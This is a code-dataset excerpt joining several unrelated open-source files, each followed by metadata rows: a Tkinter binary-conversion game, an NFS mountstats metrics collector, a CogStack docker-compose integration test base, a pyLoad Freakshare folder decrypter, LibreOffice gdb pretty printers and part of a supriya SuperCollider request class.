self.entAnswer = Tkinter.Entry(self.parent, justify = "center")
self.entAnswer.place(bordermode = "outside", x = 70, y = 230, width = 105, height = 25)
# Entry box to accept the remainder left after working out the answer.
self.entRemainder = Tkinter.Entry(self.parent, justify = "center")
self.entRemainder.place(bordermode = "outside", x = 175, y = 230, width = 20, height = 25)
# A big ol' button to submit the player's answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 5, y = 260, width = 190, height = 35)
def submit_answer(self):
# Try to extract the answer and remainder from the entry boxes. If neither can be converted to an integer,
# increase the error counter by 1.
try:
self.answer = int(self.entAnswer.get())
self.remainder = int(self.entRemainder.get())
# If both values are correct, add it to the answer chain.
# Otherwise, an error for you, player.
if self.answer == half_number(self.progress) and self.remainder == get_remainder(self.progress):
self.remainder = get_remainder(self.progress)
self.progress = half_number(self.progress)
self.answer_chain.append(self.canAnswers.create_text(0,12 * len(self.answer_chain), anchor = "nw", text = str(self.progress) + " r" + str(self.remainder)))
else:
self.error_count += 1
except ValueError:
self.error_count += 1
# Update the error counter and the current value to be dividing. Also clear the entry boxes.
self.error_value.set(str(self.error_count))
self.last_answer_value.set(str(self.progress))
self.entAnswer.delete(0, "end")
self.entRemainder.delete(0, "end")
# If the player has reached 0, it's time to bring forth the binary entry form.
if self.progress == 0:
binary_entry(self.forms, self.apps)
class EnterBinary():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["binary"] # binary being the parent form for every widget here.
self.apps["game"] = apps["game"]
self.final_binary = bin(apps["game"].number) # The final binary value representing the number.
self.binary_answer = "" # The player's attempt at entering the binary value.
self.init_ui()
def init_ui(self):
self.parent.title("Enter binary")
self.parent.geometry("300x35+400+150")
# The entry box for the player's binary answer. The player needs to look back on their answers and enter all
# of the remainders from the last one up to the first.
self.entBinary = Tkinter.Entry(self.parent, justify = "center")
self.entBinary.place(bordermode = "outside", x = 5, y = 5, width = 195, height = 25)
# Button that does what it says on the tin: submits the answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 205, y = 5, width = 90, height = 25)
def submit_answer(self):
# Take the player's answer from the entry box and precede it with "0b" so that it can be easily compared
# with the correct answer.
self.binary_answer = "0b" + self.entBinary.get()
# If the answer's correct, call the scorecard window.
# Otherwise, increase the error counter by 1 and update the main window accordingly.
if self.binary_answer == self.final_binary:
scorecard(self.forms,self.apps)
else:
self.apps["game"].error_count += 1
self.apps["game"].error_value.set(str(self.apps["game"].error_count))
class FinalScore():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["scorecard"] # scorecard is the parent for all widgets in this class.
self.error_count = apps["game"].error_count # Pass the error counter to one local to this window.
self.grade = grade(self.error_count) # Obtain a grade based on the number of errors made by the player.
# Get rid of the root and binary forms. They are no longer needed.
forms["root"].destroy()
del(apps["game"])
forms["binary"].destroy()
del(apps["binary"])
self.init_ui()
def init_ui(self):
self.parent.title("Scorecard")
self.parent.geometry("300x100+400+150")
# Label to show the player's error count, and the grade determined from that number.
self.lblScore = Tkinter.Label(self.parent, anchor = "center", text = "Errors made:\n" + str(self.error_count) + "\nYour grade:\n" + self.grade)
self.lblScore.place(bordermode = "outside", x = 5, y = 5, width = 290, height = 60)
# Button to play again.
self.btnPlayAgain = Tkinter.Button(self.parent, text = "Play again", command = self.play_again)
self.btnPlayAgain.place(bordermode = "outside", x = 5, y = 70, width = 140, height = 25)
# Button to quit.
self.btnQuit = Tkinter.Button(self.parent, text = "Exit", command = self.quit_game)
self.btnQuit.place(bordermode = "outside", x = 155, y = 70, width = 140, height = 25)
# Destroys the window and deletes this object, effectively ending the program.
def quit_game(self):
self.parent.destroy()
del(self)
# Destroys this window and spawns a new game window.
def play_again(self):
self.parent.destroy()
main()
del(self)
def main():
# Create dictionaries to store all the forms and widget classes. It's easier to pass a whole dict than it is to pass each individual form.
# Cleaner too.
forms = {}
apps = {}
forms["root"] = Tkinter.Tk() # Create a new window and assign it to the entry 'root' in the dict.
apps["game"] = GameMain(forms, apps) # Create an object based on the GameMain class, which will create all the needed widgets and variables.
forms["root"].mainloop() # Commence the event-loop.
def binary_entry(forms, apps):
forms["binary"] = Tkinter.Tk()
apps["binary"] = EnterBinary(forms, apps)
forms["binary"].mainloop()
def scorecard(forms, apps):
forms["scorecard"] = Tkinter.Tk()
apps["scorecard"] = FinalScore(forms, apps)
forms["scorecard"].mainloop()
| gpl-2.0 | -3,188,199,944,839,545,000 | 45.57561 | 159 | 0.700566 | false |
ApptuitAI/xcollector | collectors/0/mountstats.py | 1 | 11150 | #!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2013 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
"""mountstats.py Tcollector
#
# This script pull NFS mountstats data, dedupes it by mount point and puts it into the following namespaces:
#
# proc.mountstats.<rpccall>.<metric> nfshost=<nfsserver> nfsvol=<nfsvolume>
# # Note that if subdirectories of nfsvol are mounted, but the 'events' line of /proc/self/mountstats is
# identical, then the metrics will be deduped, and the first alphabetic volume name will be used
# proc.mountstats.bytes.<metric> 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# # Taken from the 'bytes:' line in /proc/self/mountstats
# # each <metric> represents one field on the line
#
# See https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsIndex
# and https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsNFSOps
# for a great example of the data available in /proc/self/mountstats
#
# Example output:
# proc.mountstats.getattr.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalread 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalwrite 1464196613 10145341022 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directread 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directwrite 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverread 1464196613 8413526 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverwrite 1464196613 10145494716 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.readpages 1464196613 2157 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.writepages 1464196613 2477054 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
"""
import sys
import time
import hashlib
COLLECTION_INTERVAL = 10 # seconds
# BYTES_FIELDS is individual fields in the 'bytes: ' line
BYTES_FIELDS = ['normalread', 'normalwrite', 'directread', 'directwrite', 'serverread', 'serverwrite', 'readpages',
'writepages']
# KEY_METRICS contains the RPC call metrics we want specific data for
KEY_METRICS = ['GETATTR', 'ACCESS', 'READ', 'WRITE']
# OTHER_METRICS contains the other RPC call we will aggregate as 'OTHER'
OTHER_METRICS = ['SETATTR', 'LOOKUP', 'READLINK', 'CREATE', 'MKDIR', 'SYMLINK', 'MKNOD', 'REMOVE', 'RMDIR', 'RENAME',
'LINK', 'READDIR', 'READDIRPLUS', 'FSSTAT', 'FSINFO', 'PATHCONF', 'COMMIT']
# RPC_FIELDS is the individual metric fields on the RPC metric lines
RPC_FIELDS = ['ops', 'txs', 'timeouts', 'txbytes', 'rxbytes', 'qtime', 'rttime', 'totaltime']
def main():
"""nfsstats main loop."""
try:
f_nfsstats = open("/proc/self/mountstats", "r")
except:
sys.exit(13)
while True:
device = None
f_nfsstats.seek(0)
ts = int(time.time())
rpc_metrics = {}
for line in f_nfsstats:
values = line.split(None)
if len(values) == 0:
continue
if len(values) >= 8 and values[0] == 'device':
if values[7] == 'nfs':
dupe = False
hostname, mount = values[1].split(':')
mountpoint = values[4]
mount = mount.rstrip("/")
device = hostname + mount + mountpoint
rpc_metrics[device] = {}
rpc_metrics[device]['other'] = dict((x, 0) for x in RPC_FIELDS)
rpc_metrics[device]['nfshost'] = hostname
rpc_metrics[device]['nfsvol'] = mount
rpc_metrics[device]['mounts'] = [mount]
for metric in KEY_METRICS:
rpc_metrics[device][metric] = dict((x, 0) for x in RPC_FIELDS)
if device == None:
continue
if dupe == True:
continue
field = values[0].rstrip(":")
# Use events as a deduping key for multiple mounts of the same volume
# ( If multiple subdirectories of the same volume are mounted to different places they
# will show up in mountstats, but will have duplicate data. )
if field == "events":
digester = hashlib.md5()
digester.update(line)
m = digester.digest()
rpc_metrics[device]['digest'] = m
if m in rpc_metrics:
# metrics already counted, mark as dupe ignore
dupe = True
first_device = rpc_metrics[m]
rpc_metrics[first_device]['mounts'].append(mount)
rpc_metrics[device]['dupe'] = True
else:
rpc_metrics[m] = device
if field == "bytes":
rpc_metrics[device]['bytes'] = dict(
(BYTES_FIELDS[i], values[i + 1]) for i in range(0, len(BYTES_FIELDS)))
if field in KEY_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
metric = field
rpc_metrics[device][metric][RPC_FIELDS[i - 1]] += int(values[i])
if field in OTHER_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
rpc_metrics[device]['other'][RPC_FIELDS[i - 1]] += int(values[i])
for device in rpc_metrics:
# Skip the duplicates
if 'dupe' in rpc_metrics[device]:
continue
# Skip the digest only entries (they wont have a referenct to the digest)
if 'digest' not in rpc_metrics[device]:
continue
nfshost = rpc_metrics[device]['nfshost']
rpc_metrics[device]['mounts'].sort()
nfsvol = rpc_metrics[device]['mounts'][0]
for metric in KEY_METRICS + ['other']:
for field in rpc_metrics[device][metric]:
print("proc.mountstats.%s.%s %d %s nfshost=%s nfsvol=%s" % (metric.lower(), field.lower(), ts, rpc_metrics[device][metric][field], nfshost, nfsvol))
for field in BYTES_FIELDS:
print("proc.mountstats.bytes.%s %d %s nfshost=%s nfsvol=%s" % (field.lower(), ts, rpc_metrics[device]['bytes'][field], nfshost, nfsvol))
sys.stdout.flush()
time.sleep(COLLECTION_INTERVAL)
if __name__ == "__main__":
main()
| lgpl-3.0 | -7,301,741,734,256,473,000 | 57.376963 | 168 | 0.688969 | false |
CogStack/cogstack | test/examples/examples_common.py | 1 | 13905 | #!/usr/bin/python
import unittest
import os
import logging
import subprocess
import time
import yaml
from connectors import *
class TestSingleExample(unittest.TestCase):
"""
A common base class for the examples test cases
"""
def __init__(self,
example_path,
sub_case="",
use_local_image_build=True,
image_build_rel_dir="../../../",
*args, **kwargs):
"""
:param example_path: the absolute patch to the examples main directory
:param sub_case: the specific sub case to test
:param use_local_image_build: whether to use a locally build CogStack Pipeline image
:param image_build_rel_dir: the relative directory where the image Dockerfile is located
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExample, self).__init__(*args, **kwargs)
# set paths and directories info
self.example_path = example_path
self.sub_case = sub_case
self.deploy_dir = '__deploy'
self.use_local_image_build = use_local_image_build
self.image_build_rel_dir = image_build_rel_dir
self.deploy_path = os.path.join(self.example_path, self.deploy_dir)
if len(self.sub_case) > 0:
self.deploy_path = os.path.join(self.deploy_path, self.sub_case)
self.image_build_rel_dir += "../"
# set commands
self.setup_cmd = 'bash setup.sh'
self.docker_cmd_up = 'docker-compose up -d' # --detach
self.docker_cmd_down = 'docker-compose down -v' # --volumes
# set up logger
log_format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
self.log = logging.getLogger(self.__class__.__name__)
@staticmethod
def getRecordsCountFromTargetDb(connector, table_name):
"""
Queries the table for the number of records
in the database specified by the connector
:param connector: the database connector :class:~JdbcConnector
:param table_name: the name of the table to query
:return: the number of records
"""
cursor = connector.cursor()
cursor.execute("SELECT COUNT(*) FROM %s" % table_name)
res = cursor.fetchall()
# res is a list of tuples
return int(res[0][0])
@staticmethod
def getRecordsCountFromTargetEs(connector, index_name):
"""
Queries the index for the number of documents (_count)
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:return: the number of records
"""
res = connector.count(index_name)
return int(res['count'])
@staticmethod
def waitForTargetEsReady(connector, index_name, max_timeout_s=300):
"""
Queries the index for the number of documents until no new arrive
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
# wait for index
while True:
try:
index_exists = connector.indices.exists(index=index_name)
if index_exists or int(time.time() - start_time_s) > max_timeout_s:
break
except Exception as e:
logging.warn('Exception while querying index: %s' % e)
pass
time.sleep(query_delay_s)
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for documents
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetEs(connector, index_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
@staticmethod
def waitForTargetDbReady(connector, table_name, max_timeout_s=300):
"""
Queries the table for the number of records until no new arrive
:param connector: the JDBC connector :class:~JdbcConnector
:param table_name: the name of the table to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for records
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetDb(connector, table_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
if cur_count_wo_changes > min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
def addBuildContextInComposeFile(self):
"""
Add the build context key in the Docker Compose file
to be using a locally build image
"""
compose_file = os.path.join(self.deploy_path, "docker-compose.override.yml")
with open(compose_file, 'r') as c_file:
compose_yaml = yaml.safe_load(c_file)
# check whether the service key exists and add the build context
if 'cogstack-pipeline' not in compose_yaml['services']:
compose_yaml['services']['cogstack-pipeline'] = dict()
compose_yaml['services']['cogstack-pipeline']['build'] = self.image_build_rel_dir
# save the file in-place
with open(compose_file, 'w') as c_file:
yaml.dump(compose_yaml, c_file, default_flow_style=False)
def setUp(self):
"""
Runs test case set up function
"""
# run setup for the example
self.log.info("Setting up ...")
try:
out = subprocess.check_output(self.setup_cmd, cwd=self.example_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.error("Failed to setup example: %s" % e)
if hasattr(e, 'output'):
self.log.error("Output: %s" % e.output)
self.fail(e.message)
# replace the image to local build
if self.use_local_image_build:
try:
self.addBuildContextInComposeFile()
except Exception as e:
self.log.error("Failed to add the local build context: %s" % e)
self.fail(e.message)
# run docker-compose
self.log.info("Starting the services ...")
try:
out = subprocess.check_output(self.docker_cmd_up, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
# clean up
try:
out = subprocess.check_output(self.docker_cmd_down, stderr=subprocess.STDOUT, cwd=self.deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as ee:
self.log.warn("Failed to stop services: %s" % ee)
self.log.error("Failed to start services: %s" % e)
self.fail(e.message)
def tearDown(self):
""""
Runs test case tear down function
"""
# run docker-compose
self.log.info("Stopping the services ...")
try:
out = subprocess.check_output(self.docker_cmd_down, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to stop services: %s " % e)
# clean up the directory
self.log.info("Cleaning up ...")
main_deploy_path = os.path.join(self.example_path, self.deploy_dir)
try:
out = subprocess.check_output('rm -rf %s' % main_deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to clean up: %s" % e)
class TestSingleExampleDb2Es(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in ElasticSearch sink
"""
def __init__(self, source_conn_conf, source_table_name, es_conn_conf, es_index_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param es_conn_conf: the sink ElasticSearch connector configuration :class:~ElasticConnectorConfig
:param es_index_name: the sink ElasticSearch index name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
:param wait_for_sink_ready_s: delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Es, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.es_conn_conf = es_conn_conf
self.es_index_name = es_index_name
self.wait_for_souce_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
time.sleep(self.wait_for_souce_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
es_conn = ElasticConnector(self.es_conn_conf)
# wait here until ES becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
#time.sleep(self.wait_for_sink_ready_max_s)
self.waitForTargetEsReady(es_conn.connector, self.es_index_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetEs(es_conn.connector, self.es_index_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
class TestSingleExampleDb2Db(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in the same or another database sink
"""
def __init__(self, source_conn_conf, source_table_name, sink_conn_conf, sink_table_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param sink_conn_conf: the sink JDBC connector configuration :class:~JdbcConnectorConfig
:param sink_table_name: the sink database table name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
:param wait_for_sink_ready_s: delay [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Db, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.sink_conn_conf = sink_conn_conf
self.sink_table_name = sink_table_name
self.wait_for_souce_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
time.sleep(self.wait_for_souce_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
sink_conn = JdbcConnector(self.sink_conn_conf)
# wait here until sink becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
self.waitForTargetDbReady(sink_conn.connector, self.sink_table_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetDb(sink_conn.connector, self.sink_table_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
| apache-2.0 | 2,910,151,856,740,945,400 | 40.88253 | 127 | 0.611363 | false |
rlindner81/pyload | module/plugins/crypter/FreakhareComFolder.py | 1 | 1784 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class FreakhareComFolder(SimpleCrypter):
__name__ = "FreakhareComFolder"
__type__ = "crypter"
__version__ = "0.08"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?freakshare\.com/folder/.+'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No",
"Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Freakhare.com folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "[email protected]")]
LINK_PATTERN = r'<a href="(http://freakshare\.com/files/.+?)" target="_blank">'
NAME_PATTERN = r'Folder:</b> (?P<N>.+)'
PAGES_PATTERN = r'Pages: +(\d+)'
def load_page(self, page_n):
if not hasattr(self, 'f_id') and not hasattr(self, 'f_md5'):
m = re.search(
r'http://freakshare.com/\?x=folder&f_id=(\d+)&f_md5=(\w+)',
self.data)
if m is not None:
self.f_id = m.group(1)
self.f_md5 = m.group(2)
return self.load('http://freakshare.com/', get={'x': 'folder',
'f_id': self.f_id,
'f_md5': self.f_md5,
'entrys': '20',
'page': page_n - 1,
'order': ''})
| gpl-3.0 | 5,220,101,632,335,312,000 | 41.47619 | 95 | 0.453475 | false |
beppec56/core | solenv/gdb/libreoffice/writerfilter.py | 5 | 2749 | # -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from libreoffice.util import printing
class OOXMLPropertySetPrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySet'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'properties', self.value['mProperties'] ) ]
return children.__iter__()
class OOXMLPropertyPrinter(object):
'''Prints writerfilter::ooxml::OOXMLProperty'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'id', self.value['mId'] ),
( 'type', self.value['meType'] ),
( 'value', self.value['mpValue'] ) ]
return children.__iter__()
class OOXMLPropertySetValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySetValue'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
class OOXMLStringValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLStringValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%s" % (self.value['mStr'])
class OOXMLIntegerValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLIntegerValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%d" % (self.value['mnValue'])
printer = None
def build_pretty_printers():
global printer
printer = printing.Printer("libreoffice/writerfilter")
printer.add('writerfilter::ooxml::OOXMLProperty', OOXMLPropertyPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySet', OOXMLPropertySetPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySetValue', OOXMLPropertySetValuePrinter)
printer.add('writerfilter::ooxml::OOXMLStringValue', OOXMLStringValuePrinter)
printer.add('writerfilter::ooxml::OOXMLIntegerValue', OOXMLIntegerValuePrinter)
printer.add('writerfilter::ooxml::OOXMLHexValue', OOXMLIntegerValuePrinter)
def register_pretty_printers(obj):
printing.register_pretty_printer(printer, obj)
build_pretty_printers()
# vim:set shiftwidth=4 softtabstop=4 expandtab:
| gpl-3.0 | 8,452,466,231,903,170,000 | 30.238636 | 91 | 0.666788 | false |
Pulgama/supriya | supriya/commands/SynthDefLoadDirectoryRequest.py | 1 | 1591 | import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
